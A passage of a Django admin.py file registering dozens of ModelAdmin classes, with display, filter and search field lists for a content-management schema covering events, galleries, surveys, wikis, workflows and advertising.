'user_defined4',\n 'user_defined5',\n 'recur_id',\n 'description',\n 'start_time',\n 'end_time',\n 'related_links',\n 'location',\n 'storage_id',\n 'time_zone',\n 'i_cal_sequence_number',\n 'sequence_number',\n )\n list_filter = ('start_date', 'end_date')\n\n\nclass EventManagementSystemAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'group_to_approve_events',\n 'timezone',\n 'template_id',\n 'badge_builder_template_id',\n 'lookup_registrant_template_id',\n 'print_badge_template_id',\n 'print_ticket_template_id',\n 'badge_instructions',\n 'ribbon_instructions',\n 'ticket_instructions',\n 'token_instructions',\n 'registration_staff_group',\n 'schedule_template_id',\n 'schedule_columns_per_page',\n )\n list_filter = ('registration_staff_group',)\n\n\nclass EventRecurAdmin(admin.ModelAdmin):\n\n list_display = (\n 'recur_id',\n 'recur_type',\n 'pattern',\n 'start_date',\n 'end_date',\n )\n list_filter = ('start_date',)\n\n\nclass EventRelatedlinkAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'eventlink_id',\n 'asset_id',\n 'link_url',\n 'linktext',\n 'group_id_view',\n 'sequence_number',\n )\n\n\nclass FileAssetAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'storage_id',\n 'filename',\n 'template_id',\n 'revision_date',\n 'cache_timeout',\n )\n\n\nclass FlatDiscountAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'template_id',\n 'must_spend',\n 'percentage_discount',\n 'price_discount',\n 'thank_you_message',\n )\n\n\nclass FolderAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'template_id',\n 'revision_date',\n 'visitor_cache_timeout',\n 'sort_alphabetically',\n 'sort_order',\n )\n\n\nclass GalleryAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'group_id_add_comment',\n 'group_id_add_file',\n 'image_resolutions',\n 'image_view_size',\n 'image_thumbnail_size',\n 'max_space_per_user',\n 'rich_edit_id_comment',\n 'template_id_add_archive',\n 'template_id_delete_album',\n 'template_id_delete_file',\n 'template_id_edit_album',\n 'template_id_edit_file',\n 'template_id_list_albums',\n 'template_id_list_albums_rss',\n 'template_id_list_files_for_user',\n 'template_id_list_files_for_user_rss',\n 'template_id_make_shortcut',\n 'template_id_search',\n 'template_id_view_slideshow',\n 'template_id_view_thumbnails',\n 'template_id_view_album',\n 'template_id_view_album_rss',\n 'template_id_view_file',\n 'view_album_asset_id',\n 'view_default',\n 'view_list_order_by',\n 'view_list_order_direction',\n 'workflow_id_commit',\n 'template_id_edit_comment',\n 'rich_edit_id_album',\n 'rich_edit_id_file',\n 'default_files_per_page',\n 'image_density',\n )\n\n\nclass GalleryAlbumAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'allow_comments',\n 'asset_id_thumbnail',\n 'user_defined1',\n 'user_defined2',\n 'user_defined3',\n 'user_defined4',\n 'user_defined5',\n 'others_can_add',\n )\n\n\nclass GalleryFileAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'user_defined1',\n 'user_defined2',\n 'user_defined3',\n 'user_defined4',\n 'user_defined5',\n 'views',\n 'friends_only',\n 'rating',\n )\n\n\nclass GalleryFileCommentAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'comment_id',\n 'user',\n 'visitor_ip',\n 'creation_date',\n 'body_text',\n )\n list_filter = ('user', 'creation_date')\n\n\nclass HttpProxyAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'proxied_url',\n 'timeout',\n 'remove_style',\n 'filter_html',\n 'follow_external',\n 'follow_redirect',\n 'cache_http',\n 'use_cache',\n 'debug',\n 'rewrite_urls',\n 'search_for',\n 'stop_at',\n 'cookie_jar_storage_id',\n 'asset_id',\n 'template_id',\n 'revision_date',\n 'cache_timeout',\n 'use_ampersand',\n 'url_pattern_filter',\n )\n\n\nclass ImageAssetAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'thumbnail_size',\n 'parameters',\n 'revision_date',\n 'annotations',\n )\n\n\nclass KBAuthAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'username', 'password')\n\n\nclass LayoutAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'template_id',\n 'content_positions',\n 'assets_to_hide',\n 'revision_date',\n 'asset_order',\n 'mobile_template_id',\n )\n\n\nclass MacroAttendEventAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'guid', 'user')\n list_filter = ('user',)\n\n\nclass MailingAdmin(admin.ModelAdmin):\n\n list_display = (\n 'mailing_id',\n 'sequence_number',\n 'date_created',\n 'last_updated',\n 'issue_id',\n 'asset_id',\n 'send_date',\n 'configuration',\n 'state',\n )\n list_filter = ('date_created', 'last_updated')\n\n\nclass MailingEmailAdmin(admin.ModelAdmin):\n\n list_display = (\n 'mail_id',\n 'sequence_number',\n 'date_created',\n 'last_updated',\n 'bounce_reason',\n 'status',\n 'user',\n 'mailing_id',\n 'error_message',\n 'sent_to',\n 'is_test',\n 'send_date',\n 'recipient_email',\n )\n list_filter = ('date_created', 'last_updated', 'user')\n\n\nclass MailmanManagerAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'asset_id', 'revision_date')\n\n\nclass MailmanManagerGroupsInListAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'list_id', 'group')\n list_filter = ('group',)\n\n\nclass MailmanManagerListAdmin(admin.ModelAdmin):\n\n list_display = (\n 'list_id',\n 'is_alias',\n 'list_name',\n 'list_title',\n 'list_address',\n 'extra_addresses',\n 'config_overrides',\n 'exclude_group',\n )\n\n\nclass MailmanManagerSubscribeConfirmationAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'list_id',\n 'confirmation_code',\n 'email',\n 'date_added',\n )\n list_filter = ('date_added',)\n\n\nclass MapAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'group_id_add_point',\n 'map_api_key',\n 'map_height',\n 'map_width',\n 'start_latitude',\n 'start_longitude',\n 'start_zoom',\n 'template_id_edit_point',\n 'template_id_view',\n 'template_id_view_point',\n 'workflow_id_point',\n )\n\n\nclass MapPointAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'latitude',\n 'longitude',\n 'website',\n 'address1',\n 'address2',\n 'city',\n 'state',\n 'zip_code',\n 'country',\n 'phone',\n 'fax',\n 'email',\n 'storage_id_photo',\n 'user_defined1',\n 'user_defined2',\n 'user_defined3',\n 'user_defined4',\n 'user_defined5',\n )\n\n\nclass MatrixAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'detail_template_id',\n 'compare_template_id',\n 'search_template_id',\n 'categories',\n 'asset_id',\n 'template_id',\n 'revision_date',\n 'max_comparisons',\n 'max_comparisons_privileged',\n 'group_to_add',\n 'default_sort',\n 'compare_color_no',\n 'compare_color_limited',\n 'compare_color_costs_extra',\n 'compare_color_free_add_on',\n 'compare_color_yes',\n 'submission_approval_workflow_id',\n 'ratings_duration',\n 'edit_listing_template_id',\n 'screenshots_config_template_id',\n 'screenshots_template_id',\n 'statistics_cache_timeout',\n 'max_comparisons_group',\n 'max_comparisons_group_int',\n 'max_screenshot_width',\n 'max_screenshot_height',\n 'listings_cache_timeout',\n )\n\n\nclass MatrixListingAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'screenshots',\n 'description',\n 'version',\n 'views',\n 'compares',\n 'clicks',\n 'views_last_ip',\n 'compares_last_ip',\n 'clicks_last_ip',\n 'last_updated',\n 'maintainer',\n 'manufacturer_name',\n 'manufacturer_url',\n 'product_url',\n 'score',\n )\n\n\nclass MatrixListingAttributeAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'matrix_id',\n 'matrix_listing_id',\n 'attribute_id',\n 'value',\n )\n\n\nclass MatrixListingRatingAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'time_stamp',\n 'category',\n 'rating',\n 'listing_id',\n 'ip_address',\n 'asset_id',\n 'user',\n )\n list_filter = ('user',)\n\n\nclass MatrixListingRatingSummaryAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'listing_id',\n 'category',\n 'mean_value',\n 'median_value',\n 'count_value',\n 'asset_id',\n )\n\n\nclass MatrixAttributeAdmin(admin.ModelAdmin):\n\n list_display = (\n 'attribute_id',\n 'category',\n 'name',\n 'description',\n 'field_type',\n 'default_value',\n 'asset_id',\n 'options',\n )\n search_fields = ('name',)\n\n\nclass MessageBoardAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'template_id',\n 'revision_date',\n 'visitor_cache_timeout',\n )\n\n\nclass MultiSearchAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'template_id',\n 'predefined_searches',\n 'cache_timeout',\n )\n\n\nclass NavigationAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'assets_to_include',\n 'start_type',\n 'start_point',\n 'descendant_end_point',\n 'show_system_pages',\n 'show_hidden_pages',\n 'show_unprivileged_pages',\n 'template_id',\n 'ancestor_end_point',\n 'revision_date',\n 'mime_type',\n 'reverse_page_loop',\n )\n\n\nclass NewsletterAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'newsletter_template_id',\n 'my_subscriptions_template_id',\n 'newsletter_header',\n 'newsletter_footer',\n 'newsletter_categories',\n )\n\n\nclass NewsletterCollectionAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'view_template_id',\n 'recent_issue_count',\n )\n\n\nclass NewsletterSubscriptionAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'user',\n 'subscriptions',\n 'last_time_sent',\n )\n list_filter = ('user',)\n\n\nclass PMProjectAdmin(admin.ModelAdmin):\n\n list_display = (\n 'project_id',\n 'asset_id',\n 'name',\n 'description',\n 'start_date',\n 'end_date',\n 'project_manager',\n 'duration_units',\n 'hours_per_day',\n 'target_budget',\n 'percent_complete',\n 'parent_id',\n 'creation_date',\n 'created_by',\n 'last_updated_by',\n 'last_update_date',\n 'project_observer',\n )\n search_fields = ('name',)\n\n\nclass PMTaskAdmin(admin.ModelAdmin):\n\n list_display = (\n 'task_id',\n 'project_id',\n 'task_name',\n 'duration',\n 'start_date',\n 'end_date',\n 'dependants',\n 'parent_id',\n 'percent_complete',\n 'sequence_number',\n 'creation_date',\n 'created_by',\n 'last_updated_by',\n 'last_update_date',\n 'lag_time',\n 'task_type',\n )\n\n\nclass PMTaskResourceAdmin(admin.ModelAdmin):\n\n list_display = (\n 'task_resource_id',\n 'task_id',\n 'sequence_number',\n 'resource_kind',\n 'resource_id',\n )\n\n\nclass PMWobjectAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'project_dashboard_template_id',\n 'project_display_template_id',\n 'gantt_chart_template_id',\n 'edit_task_template_id',\n 'group_to_add',\n 'revision_date',\n 'resource_popup_template_id',\n 'resource_list_template_id',\n )\n\n\nclass PhotoAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'exif_data',\n 'location',\n )\n\n\nclass PhotoRatingAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'asset_id', 'user', 'visitor_ip', 'rating')\n list_filter = ('user',)\n\n\nclass PollAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'active',\n 'graph_width',\n 'vote_group',\n 'question',\n 'a1',\n 'a2',\n 'a3',\n 'a4',\n 'a5',\n 'a6',\n 'a7',\n 'a8',\n 'a9',\n 'a10',\n 'a11',\n 'a12',\n 'a13',\n 'a14',\n 'a15',\n 'a16',\n 'a17',\n 'a18',\n 'a19',\n 'a20',\n 'karma_per_vote',\n 'randomize_answers',\n 'asset_id',\n 'template_id',\n 'revision_date',\n 'graph_configuration',\n 'generate_graph',\n )\n\n\nclass PollAnswerAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'answer', 'user', 'ip_address', 'asset_id')\n list_filter = ('user',)\n\n\nclass PostAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'thread_id',\n 'username',\n 'content',\n 'views',\n 'content_type',\n 'user_defined1',\n 'user_defined2',\n 'user_defined3',\n 'user_defined4',\n 'user_defined5',\n 'storage_id',\n 'rating',\n 'revision_date',\n 'original_email',\n )\n\n\nclass PostRatingAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'user',\n 'ip_address',\n 'date_of_rating',\n 'rating',\n )\n list_filter = ('user',)\n\n\nclass ProductAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'image1',\n 'image2',\n 'image3',\n 'brochure',\n 'manual',\n 'warranty',\n 'asset_id',\n 'template_id',\n 'revision_date',\n 'cache_timeout',\n 'thank_you_message',\n 'accessory_json',\n 'benefit_json',\n 'feature_json',\n 'related_json',\n 'specification_json',\n 'variants_json',\n 'is_shipping_required',\n )\n\n\nclass RichEditAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'ask_about_rich_edit',\n 'preformatted',\n 'editor_width',\n 'editor_height',\n 'source_editor_width',\n 'source_editor_height',\n 'use_br',\n 'nowrap',\n 'remove_line_breaks',\n 'npwrap',\n 'directionality',\n 'toolbar_location',\n 'css_file',\n 'valid_elements',\n 'toolbar_row1',\n 'toolbar_row2',\n 'toolbar_row3',\n 'enable_context_menu',\n 'revision_date',\n 'disable_rich_editor',\n 'inline_popups',\n 'allow_media',\n )\n\n\nclass SQLReportAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'db_query1',\n 'paginate_after',\n 'preprocess_macros1',\n 'debug_mode',\n 'database_link_id1',\n 'placeholder_params1',\n 'preprocess_macros2',\n 'db_query2',\n 'placeholder_params2',\n 'database_link_id2',\n 'preprocess_macros3',\n 'db_query3',\n 'placeholder_params3',\n 'database_link_id3',\n 'preprocess_macros4',\n 'db_query4',\n 'placeholder_params4',\n 'database_link_id4',\n 'preprocess_macros5',\n 'db_query5',\n 'placeholder_params5',\n 'database_link_id5',\n 'asset_id',\n 'template_id',\n 'revision_date',\n 'cache_timeout',\n 'prequery_statements1',\n 'prequery_statements2',\n 'prequery_statements3',\n 'prequery_statements4',\n 'prequery_statements5',\n 'download_type',\n 'download_filename',\n 'download_template_id',\n 'download_mime_type',\n 'download_user_group',\n )\n\n\nclass ShelfAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'asset_id', 'revision_date', 'template_id')\n\n\nclass ShortcutAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'override_title',\n 'override_description',\n 'override_template',\n 'override_display_title',\n 'override_template_id',\n 'shortcut_by_criteria',\n 'resolve_multiples',\n 'shortcut_criteria',\n 'asset_id',\n 'template_id',\n 'shortcut_to_asset_id',\n 'disable_content_lock',\n 'revision_date',\n 'pref_fields_to_show',\n 'pref_fields_to_import',\n 'show_reload_icon',\n )\n\n\nclass ShortcutOverrideAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'asset_id', 'field_name', 'new_value')\n\n\nclass StockDataAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'template_id',\n 'display_template_id',\n 'default_stocks',\n 'source',\n 'failover',\n 'revision_date',\n )\n\n\nclass StoryAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'headline',\n 'subtitle',\n 'byline',\n 'location',\n 'highlights',\n 'story',\n 'photo',\n )\n\n\nclass StoryArchiveAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'stories_per_page',\n 'group_to_post',\n 'template_id',\n 'story_template_id',\n 'edit_story_template_id',\n 'keyword_list_template_id',\n 'archive_after',\n 'rich_editor_id',\n 'approval_workflow_id',\n 'photo_width',\n )\n\n\nclass StoryTopicAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'stories_per',\n 'stories_short',\n 'template_id',\n 'story_template_id',\n )\n\n\nclass SubscriptionAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'template_id',\n 'thank_you_message',\n 'price',\n 'subscription_group',\n 'duration',\n 'execute_on_subscription',\n 'karma',\n 'redeem_subscription_code_template_id',\n 'recurring_subscription',\n )\n\n\nclass SubscriptionCodeAdmin(admin.ModelAdmin):\n\n list_display = ('code', 'batch_id', 'status', 'date_used', 'used_by')\n\n\nclass SubscriptionCodeBatchAdmin(admin.ModelAdmin):\n\n list_display = (\n 'batch_id',\n 'name',\n 'description',\n 'subscription_id',\n 'expiration_date',\n 'date_created',\n )\n search_fields = ('name',)\n\n\nclass SurveyAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'group_to_take_survey',\n 'group_to_edit_survey',\n 'group_to_view_reports',\n 'overview_template_id',\n 'max_responses_per_user',\n 'gradebook_template_id',\n 'asset_id',\n 'template_id',\n 'revision_date',\n 'survey_edit_template_id',\n 'answer_edit_template_id',\n 'question_edit_template_id',\n 'section_edit_template_id',\n 'survey_take_template_id',\n 'survey_questions_id',\n 'exit_url',\n 'survey_json',\n 'time_limit',\n 'show_progress',\n 'show_time_limit',\n 'do_after_time_limit',\n 'on_survey_end_workflow_id',\n 'quiz_mode_summary',\n 'survey_summary_template_id',\n 'allow_back_btn',\n 'feedback_template_id',\n 'test_results_template_id',\n )\n\n\nclass SurveyAnswerOldAdmin(admin.ModelAdmin):\n\n list_display = (\n 'survey_id',\n 'survey_question_id',\n 'survey_answer_id',\n 'sequence_number',\n 'goto_question',\n 'answer',\n 'is_correct',\n )\n\n\nclass SurveyOldAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'question_order',\n 'group_to_take_survey',\n 'group_to_view_reports',\n 'mode',\n 'survey_id',\n 'anonymous',\n 'questions_per_page',\n 'response_template_id',\n 'overview_template_id',\n 'max_responses_per_user',\n 'questions_per_response',\n 'gradebook_template_id',\n 'asset_id',\n 'template_id',\n 'revision_date',\n 'default_section_id',\n )\n\n\nclass SurveyQuestionResponseOldAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'survey_id',\n 'survey_question_id',\n 'survey_answer_id',\n 'survey_response_id',\n 'response',\n 'comment',\n 'date_of_response',\n )\n\n\nclass SurveyQuestionTypeAdmin(admin.ModelAdmin):\n\n list_display = ('question_type', 'answers')\n\n\nclass SurveyQuestionOldAdmin(admin.ModelAdmin):\n\n list_display = (\n 'survey_id',\n 'survey_question_id',\n 'question',\n 'sequence_number',\n 'allow_comment',\n 'randomize_answers',\n 'answer_field_type',\n 'goto_question',\n 'survey_section_id',\n )\n\n\nclass SurveyResponseAdmin(admin.ModelAdmin):\n\n list_display = (\n 'asset_id',\n 'survey_response_id',\n 'user',\n 'username',\n 'ip_address',\n 'start_date',\n 'end_date',\n 'is_complete',\n 'anon_id',\n 'response_json',\n 'revision_date',\n )\n list_filter = ('user',)\n\n\nclass SurveyResponseOldAdmin(admin.ModelAdmin):\n\n list_display = (\n 'survey_id',\n 'survey_response_id',\n 'user',\n 'username',\n 'ip_address',\n 'start_date',\n 'end_date',\n 'is_complete',\n )\n list_filter = ('user',)\n\n\nclass SurveySectionOldAdmin(admin.ModelAdmin):\n\n list_display = (\n 'survey_id',\n 'survey_section_id',\n 'section_name',\n 'sequence_number',\n )\n\n\nclass SurveyTempReportAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'survey_response_id',\n 'order',\n 'section_number',\n 'section_name',\n 'question_number',\n 'question_name',\n 'question_comment',\n 'answer_number',\n 'answer_value',\n 'answer_comment',\n 'entry_date',\n 'is_correct',\n 'value',\n 'file_storeage_id',\n )\n\n\nclass SurveyTestAdmin(admin.ModelAdmin):\n\n list_display = (\n 'test_id',\n 'sequence_number',\n 'date_created',\n 'last_updated',\n 'asset_id',\n 'name',\n 'test',\n )\n list_filter = ('date_created', 'last_updated')\n search_fields = ('name',)\n\n\nclass SyndicatedContentAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'rss_url',\n 'max_headlines',\n 'asset_id',\n 'template_id',\n 'revision_date',\n 'has_terms',\n 'cache_timeout',\n 'process_macro_in_rss_url',\n )\n\n\nclass TTProjectListAdmin(admin.ModelAdmin):\n\n list_display = (\n 'project_id',\n 'asset_id',\n 'project_name',\n 'creation_date',\n 'created_by',\n 'last_updated_by',\n 'last_update_date',\n )\n\n\nclass TTProjectResourceListAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'project_id', 'resource_id')\n\n\nclass TTProjectTaskAdmin(admin.ModelAdmin):\n\n list_display = ('task_id', 'project_id', 'task_name')\n\n\nclass TTReportAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'report_id',\n 'asset_id',\n 'start_date',\n 'end_date',\n 'report_complete',\n 'resource_id',\n 'creation_date',\n 'created_by',\n 'last_updated_by',\n 'last_update_date',\n )\n\n\nclass TTTimeEntryAdmin(admin.ModelAdmin):\n\n list_display = (\n 'entry_id',\n 'project_id',\n 'task_id',\n 'task_date',\n 'hours',\n 'comments',\n 'report_id',\n )\n\n\nclass TTWobjectAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'user_view_template_id',\n 'manager_view_template_id',\n 'time_row_template_id',\n 'pm_asset_id',\n 'group_to_manage',\n 'revision_date',\n 'pm_integration',\n )\n\n\nclass ThingyAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'template_id',\n 'default_thing_id',\n )\n\n\nclass ThingyRecordAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'template_id_view',\n 'thing_id',\n 'thing_fields',\n 'thank_you_text',\n 'price',\n 'duration',\n 'field_price',\n )\n\n\nclass ThingyRecordRecordAdmin(admin.ModelAdmin):\n\n list_display = (\n 'record_id',\n 'sequence_number',\n 'date_created',\n 'last_updated',\n 'transaction_id',\n 'asset_id',\n 'expires',\n 'user',\n 'fields',\n 'is_hidden',\n 'sent_expires_notice',\n )\n list_filter = ('date_created', 'last_updated', 'user')\n\n\nclass ThingyFieldAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'thing_id',\n 'field_id',\n 'sequence_number',\n 'date_created',\n 'created_by',\n 'date_updated',\n 'updated_by',\n 'label',\n 'field_type',\n 'default_value',\n 'possible_values',\n 'subtext',\n 'status',\n 'width',\n 'height',\n 'vertical',\n 'extras',\n 'display',\n 'view_screen_title',\n 'display_in_search',\n 'search_in',\n 'field_in_other_thing_id',\n 'size',\n 'pretext',\n )\n\n\nclass ThingyIkgQcHs3rCevOFoHUiU8kgAdmin(admin.ModelAdmin):\n\n list_display = (\n 'thing_data_id',\n 'date_created',\n 'created_by_id',\n 'updated_by_id',\n 'updated_by_name',\n 'last_updated',\n 'ip_address',\n 'field_bm1xw0ch6_xw_dmt_ssn_ny_ti_q',\n 'field_c_w_cwp_s3rr_dcld1_ck2_vz_wtw',\n 'field_es_k_aj8_dshl_miqdq_sw4i_ig',\n 'field_7_u_zt5dzr_q_yj_sm_w_epk_cf_xya',\n 'field_f_xc7_l2_rn_bqn8f_hej_ez3_ja',\n )\n\n\nclass ThingyThingAdmin(admin.ModelAdmin):\n\n list_display = (\n 'asset_id',\n 'thing_id',\n 'label',\n 'edit_screen_title',\n 'edit_instructions',\n 'group_id_add',\n 'group_id_edit',\n 'save_button_label',\n 'after_save',\n 'edit_template_id',\n 'on_add_workflow_id',\n 'on_edit_workflow_id',\n 'on_delete_workflow_id',\n 'group_id_view',\n 'view_template_id',\n 'default_view',\n 'search_screen_title',\n 'search_description',\n 'group_id_search',\n 'group_id_import',\n 'group_id_export',\n 'search_template_id',\n 'things_per_page',\n 'sort_by',\n 'display',\n 'export_meta_data',\n 'max_entries_per_user',\n )\n\n\nclass ThreadAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'replies',\n 'last_post_id',\n 'last_post_date',\n 'is_locked',\n 'is_sticky',\n 'subscription_group',\n 'revision_date',\n 'karma',\n 'karma_scale',\n 'karma_rank',\n 'thread_rating',\n )\n list_filter = ('subscription_group',)\n\n\nclass ThreadReadAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'thread_id', 'user')\n list_filter = ('user',)\n\n\nclass WeatherDataAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'template_id',\n 'locations',\n 'partner_id',\n 'license_key',\n )\n\n\nclass WikiMasterAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'group_to_edit_pages',\n 'group_to_administer',\n 'rich_editor',\n 'front_page_template_id',\n 'page_template_id',\n 'page_edit_template_id',\n 'recent_changes_template_id',\n 'most_popular_template_id',\n 'page_history_template_id',\n 'search_template_id',\n 'recent_changes_count',\n 'recent_changes_count_front',\n 'most_popular_count',\n 'most_popular_count_front',\n 'thumbnail_size',\n 'max_image_size',\n 'approval_workflow',\n 'use_content_filter',\n 'filter_code',\n 'by_keyword_template_id',\n 'allow_attachments',\n )\n\n\nclass WikiPageAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'content',\n 'views',\n 'is_protected',\n 'action_taken',\n 'action_taken_by',\n )\n\n\nclass WorkflowAdmin(admin.ModelAdmin):\n\n list_display = (\n 'workflow_id',\n 'title',\n 'description',\n 'enabled',\n 'type',\n 'mode',\n )\n\n\nclass WorkflowActivityAdmin(admin.ModelAdmin):\n\n list_display = (\n 'activity_id',\n 'workflow_id',\n 'title',\n 'description',\n 'sequence_number',\n 'class_name',\n )\n\n\nclass WorkflowActivityDataAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'activity_id', 'name', 'value')\n search_fields = ('name',)\n\n\nclass WorkflowInstanceAdmin(admin.ModelAdmin):\n\n list_display = (\n 'instance_id',\n 'workflow_id',\n 'current_activity_id',\n 'priority',\n 'class_name',\n 'method_name',\n 'parameters',\n 'running_since',\n 'last_update',\n 'last_status',\n 'no_session',\n )\n\n\nclass WorkflowInstanceScratchAdmin(admin.ModelAdmin):\n\n list_display = (u'id', 'instance_id', 'name', 'value')\n search_fields = ('name',)\n\n\nclass WorkflowScheduleAdmin(admin.ModelAdmin):\n\n list_display = (\n 'task_id',\n 'title',\n 'enabled',\n 'run_once',\n 'minute_of_hour',\n 'hour_of_day',\n 'day_of_month',\n 'month_of_year',\n 'day_of_week',\n 'workflow_id',\n 'class_name',\n 'method_name',\n 'priority',\n 'parameters',\n )\n\n\nclass ZipArchiveAssetAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'template_id',\n 'show_page',\n 'revision_date',\n )\n\n\nclass AdSkuPurchaseAdmin(admin.ModelAdmin):\n\n list_display = (\n 'ad_sku_purchase_id',\n 'sequence_number',\n 'date_created',\n 'last_updated',\n 'is_deleted',\n 'clicks_purchased',\n 'date_of_purchase',\n 'impressions_purchased',\n 'transaction_item_id',\n 'user',\n 'ad_id',\n 'stored_image',\n )\n list_filter = ('date_created', 'last_updated', 'user')\n\n\nclass AdSpaceAdmin(admin.ModelAdmin):\n\n list_display = (\n 'ad_space_id',\n 'name',\n 'title',\n 'description',\n 'cost_per_impression',\n 'minimum_impressions',\n 'cost_per_click',\n 'minimum_clicks',\n 'width',\n 'height',\n 'group_to_purchase',\n )\n search_fields = ('name',)\n\n\nclass AddressAdmin(admin.ModelAdmin):\n\n list_display = (\n 'address_id',\n 'address_book_id',\n 'label',\n 'first_name',\n 'last_name',\n 'address1',\n 'address2',\n 'address3',\n 'city',\n 'state',\n 'country',\n 'code',\n 'phone_number',\n 'organization',\n 'email',\n )\n\n\nclass AddressBookAdmin(admin.ModelAdmin):\n\n list_display = (\n 'address_book_id',\n 'session_id',\n 'user',\n 'default_address_id',\n )\n list_filter = ('user',)\n\n\nclass AdvertisementAdmin(admin.ModelAdmin):\n\n list_display = (\n 'ad_id',\n 'ad_space_id',\n 'owner_user',\n 'is_active',\n 'title',\n 'type',\n 'storage_id',\n 'ad_text',\n 'url',\n 'rich_media',\n 'border_color',\n 'text_color',\n 'background_color',\n 'clicks',\n 'clicks_bought',\n 'impressions',\n 'impressions_bought',\n 'priority',\n 'next_in_priority',\n 'rendered_ad',\n )\n list_filter = ('owner_user',)\n\n\nclass AnalyticRuleAdmin(admin.ModelAdmin):\n\n list_display = (\n 'rule_id',\n 'sequence_number',\n 'date_created',\n 'last_updated',\n 'bucket_name',\n 'regexp',\n )\n list_filter = ('date_created', 'last_updated')\n\n\nclass AssetAdmin(admin.ModelAdmin):\n\n list_display = (\n 'asset_id',\n 'parent_id',\n 'lineage',\n 'state',\n 'class_name',\n 'creation_date',\n 'created_by',\n 'state_changed',\n 'state_changed_by',\n 'is_locked_by',\n 'is_system',\n 'last_exported_as',\n )\n\n\nclass AssetAspectCommentAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 'revision_date',\n 'comments',\n 'average_comment_rating',\n )\n\n\nclass AssetAspectMailableAdmin(admin.ModelAdmin):\n\n list_display = (\n u'id',\n 'asset_id',\n 